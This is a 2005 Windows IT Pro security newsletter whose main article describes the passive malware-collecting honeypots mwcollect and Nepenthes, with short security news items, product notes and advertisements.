Skip navigation

Security UPDATE--Honeypots That Collect Malware--August 31, 2005

This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE.

A Robust Combination from Symantec

How to solve the anti-spam dilemma


1. In Focus: Honeypots That Collect Malware

2. Security News and Features

- Recent Security Vulnerabilities

- Vulnerabilities in PHP-based Libraries

- Secure Computing to Acquire CyberGuard

- EarthLink to Acquire Security Solutions Maker Aluria Software

3. Security Toolkit

- Security Matters Blog


4. New and Improved

- Pocket PC File Encryption


==== Sponsor: Symantec ====

A Robust Combination from Symantec

Staying on top of today's vulnerabilities and threats is one of the most difficult, time-consuming, and even risky tasks facing IT professionals like you. Never has it been so important to proactively manage your IT environment. Fortunately, Symantec can help.

Symantec LiveState Patch Manager 6.0 helps keep your enterprise devices secure and available by identifying known vulnerabilities and then installing necessary patches on hundreds of systems in minutes, not hours. That includes mobile and remote devices, too.

For extra protection from threats that even the latest patches can't address, there's Symantec Client Security 3.0. With its exclusive intrusion prevention technology, Symantec Client Security 3.0 proactively protects systems against known and unknown exploits before they can compromise your system, including spyware, adware, viruses, and other malicious intrusions. Learn more at


==== 1. In Focus: Honeypots That Collect Malware ====

by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

The last two weeks, I've written about proactive honeypots that seek out malicious Web sites, two of which are unavailable to the public and one that you can download to run on your own networks. If you missed either of those articles, they're available on our Web site at the URLs below. This week, I'll discuss two "passive" honeypots--that is, honeypots that sit waiting for intrusion attempts.

Because honeypots present an attack point for potential intruders, they're useful in determining what sort of intrusion attempts are being launched against your network. In some cases, they can detect intrusion methods that are completely unknown to even the most up-to-date Intrusion Detection Systems (IDSs).

I recently learned about two new honeypots. The first is mwcollect (at the URL below), which was released in April 2005 and is partially funded by The Honeynet Project. Mwcollect is designed specifically to collect malware--thus the "mw" prefix in the mwcollect name. The tool runs on Linux and OpenBSD and can also run on Cygwin, a Linux environment that runs on Windows platforms.

Mwcollect is a little different from typical honeypots because it was originally designed to collect bot software, but the current version collects worms and other forms of malware that take advantage of vulnerabilities that mwcollect exposes. According to the mwcollect Web site, systems that run the tool can't be infected with malware due to the way mwcollect operates internally. It binds to specified ports, waits for an exploit attempt, scans for shell code, and tries to download any related malware. Captured malware can then be added to a database at the mwcollect Web site.

The next version of mwcollect will allow three levels of network interactivity. The first level is the same as I describe above. The second level will passively analyze network traffic (like a sniffer in promiscuous mode would) and will try to download any related malware. The third or lowest level of interactivity will also passively analyze network traffic but won't try to download related malware. You can learn a little more about the tool at the Web site, and join in an Internet Relay Chat (IRC) for further discussion.

The second new honeypot, Nepenthes, was released earlier this month and is similar to mwcollect. It too presents known vulnerabilities to the network and waits for intrusion attempts. Current modules for Nepenthes allow it to emulate problems with DCOM, Local Security Authority Service (LSASS), WINS, ASN1, NetBIOS, SQL Server, and a lot more Microsoft services. Because Nepenthes runs on Linux systems, none of those services would actually be available, which means exploits against them would have little or no effect on the underlying OS.

Just like mwcollect, when Nepenthes detects intrusion attempts, it tries to download any related malware through a variety of methods including FTP, Trivial FTP (TFTP), and HTTP. Captured malware is then sent to a center server hosted by the developers of the tool.

Documentation for Nepenthes doesn't explain what goes on under the hood. But as best I can determine (I haven't actually installed the tool yet), it captures shell-code exploits; looks for instructions that try to download code from the Internet (which many types of malware have); and if it finds such instructions, proceeds to try to download the malware in accordance with the intruder's intent--for example, if the captured code indicates that the system should use FTP to download a file, Nepenthes will try to do that. I suspect that mwcollect works in a similar fashion. Nepenthes doesn't appear to run on Windows platforms using Cygwin, so you'll probably need a Linux-based system to put it to use on your networks.

If you use honeypots as do so many administrators these days, be sure to take a closer look at mwcollect and Nepenthes.


We need your help! Windows IT Pro is launching its second Windows IT Pro Industry Salary Survey, and we want to find out all about you and what makes you a satisfied IT pro. When you complete the survey (about 10 minutes of your time), you'll be entered in a drawing for one of two $300 American Express gift certificates. Look for the survey results--and see how you stack up against your peers--in our December issue. To take the survey, go to


==== Sponsor: Postini ====

How to solve the anti-spam dilemma

In this free white paper learn why older spam prevention technologies using traditional content filtering don't work against the latest spammer tactics - and why more corporate email administrators are turning to a more accurate, more effective approach: managed email security service. Find out how to achieve email security dynamically with multiple layer protection ... minimize false positives ... cut email administration costs (and hassles) ... and keep user communities happy and productive. Download your free copy now.


==== 2. Security News and Features ====

Recent Security Vulnerabilities

If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at

Vulnerabilities in PHP-based Libraries

Major security problems in two popular Hypertext Preprocessor (PHP)-based libraries have led to complete removal of a particular programming function in those libraries. In June, problems were discovered in libraries that provide PHP-based support for XML and RPC, both of which are used by many applications today, including hugely popular blog software packages. A subsequent code audit revealed still more vulnerabilities.

Secure Computing to Acquire CyberGuard

Secure Computing announced that it will acquire CyberGuard. Under the terms of the deal, Secure Computing will acquire all outstanding shares of CyberGuard common stock and in turn give shares of its common stock, as well as cash, to CyberGuard stockholders.

EarthLink to Acquire Security Solutions Maker Aluria Software

EarthLink and Aluria Software announced a deal in which EarthLink will acquire the assets of Aluria, makers of the Spyware Eliminator software. Terms of the deal, expected to close in September, weren't announced.


==== Resources and Events ====

SQL Server 2005 Roadshow Is Coming to a City Near You

Get the facts about migrating to SQL Server 2005. SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database computing environment. Attend and receive a 1-year membership to PASS and 1-year subscription to SQL Server Magazine. Register now!

Consolidate Your SQL Server Infrastructure

Shared data clustering is the breakthrough consolidation solution for Microsoft Windows servers. In this free Web seminar, learn how shared data clustering technology can reduce capital expenditures by at least 50 percent, improve management efficiency, reduce operational expense, ensure high availability across all SQL Server instances, and more! Find out how you can reduce the overall Total Cost of Ownership (TCO) for SQL Server cluster deployments by as much as 60 percent over three years! Sign up today!

High Risk Internet Access: Are You in Control?

Defending against Internet criminals, spyware, and phishing and addressing the points of risk that Internet-enabled applications expose your organization to can seem like an epic battle with Medusa. So how do you take control of these valuable resources? In this free Web seminar, you'll get the tools you need to help you analyze the impact Internet-based threats have on your organization and tools to aid you in the construction of Acceptable-Use Policies (AUPs).

Get Ready for SQL Server 2005 Roadshow in Europe

Back by popular demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a 1-year membership to PASS and 1-year subscription to SQL Server Magazine. Register now!

Discover SQL Server 2005 for the enterprise. Are you prepared?

In this free, half-day event, you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical, enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today!

All high availability solutions are not created equal--how does yours measure up?

In this free Web seminar, you'll get the tools you need to ensure your systems aren't going down. You'll discover the various categories of high availability and disaster recovery solutions available and the pros and cons of each. You'll learn what solutions help you take preemptive, corrective action without resorting to a full system failover, or in extreme cases, that perform a nondisruptive, automatic switchover to a secondary server.


==== Featured White Paper ====

The Impact of Disk Defragmentation

Nearly every IT professional has a fragmentation horror story--in which fragmentation severely degraded performance so that systems were unusable. In this free white paper, learn what impact fragmentation has on users and system activities and discover how quickly fragmentation accumulates as a result of these activities. Plus get the recommendations you need to manage the frequency of defragmentation across your infrastructure.


==== 3. Security Toolkit ====

Security Matters Blog: Wi-Fi Security Is Better Than I Expected

by Mark Joseph Edwards,

There's a lot of talk about the need for increased Wi-Fi security. I was surprised at what I found when I did a little "war driving" in my area.


by John Savill,

Q: I created a custom .adm file and imported it into a Group Policy Object's (GPO's) Administrative Templates. Why can't I see any of the settings in Group Policy Editor (GPE)?

Find the answer at


==== Announcements ====

(from Windows IT Pro and its partners)

Stay Up-To-Date with the Windows IT Security Newsletter

Each new issue of the Windows IT Security newsletter features related product coverage of the best security tools available and expert advice on the best way to implement various security components. We've also expanded our security content to include even more fundamentals on building and maintaining a secure enterprise. In addition, paid subscribers get online access to our entire online security article database (over 1900 articles)! Subscribe today:

VIP Monthly Online Pass = Quick Security Answers!

Sign up today for your VIP Monthly Online Pass and get 24/7 access to the entire online article database, including exclusive, subscriber-only Windows IT Security newsletter content. That's a database of over 1900 security articles to help you get all the answers you need, when you need them. Sign up now:


==== 4. New and Improved ====

by Renee Munshi, [email protected]

Pocket PC File Encryption

Infotecs offers ViPNet Safe Disk for Pocket PC, which encrypts and password-protects sensitive files on PDAs. Data is protected even when the device is switched off or in standby mode. You can open and edit any file from a secure folder in a word processor or database program--the file is automatically decrypted when opened and encrypted when saved. ViPNet Safe Disk for Pocket PC supports two 256-bit encryption algorithms: Advanced Encryption Standard (AES) and Government Standard (GOST). The interface is specially designed to help PDA users manage protected files and folders with just a few taps. You can exchange protected data with a PC that's running ViPNet Safe Disk. ViPNet Safe Disk for Pocket PC runs under Windows Mobile 2003 and costs $26.40 for a single-user license. For more information, go to

Tell Us About a Hot Product and Get a T-Shirt!

Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to

[email protected]

Editor's note: Share Your Security Discoveries and Get $100

Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to [email protected] If we print your submission, you'll get $100. We edit submissions for style, grammar, and length.


==== Sponsored Links ====

Professional and secure remote control from all major platforms

Argent Versus MOM 2005

Experts Pick the Best Windows Monitoring Solution

Tech jobs at Dice

Search 65K+ new IT jobs daily--Tech expert jobs at top companies!


==== Contact Us ====

About the newsletter -- [email protected]

About technical questions --

About product news -- [email protected]

About your subscription -- [email protected]

About sponsoring Security UPDATE -- [email protected]


This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today.

View the Windows IT Pro privacy policy at

Windows IT Pro, a division of Penton Media, Inc.

221 East 29th Street, Loveland, CO 80538

Attention: Customer Service Department

Copyright 2005, Penton Media, Inc. All rights reserved.

Hide comments


  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.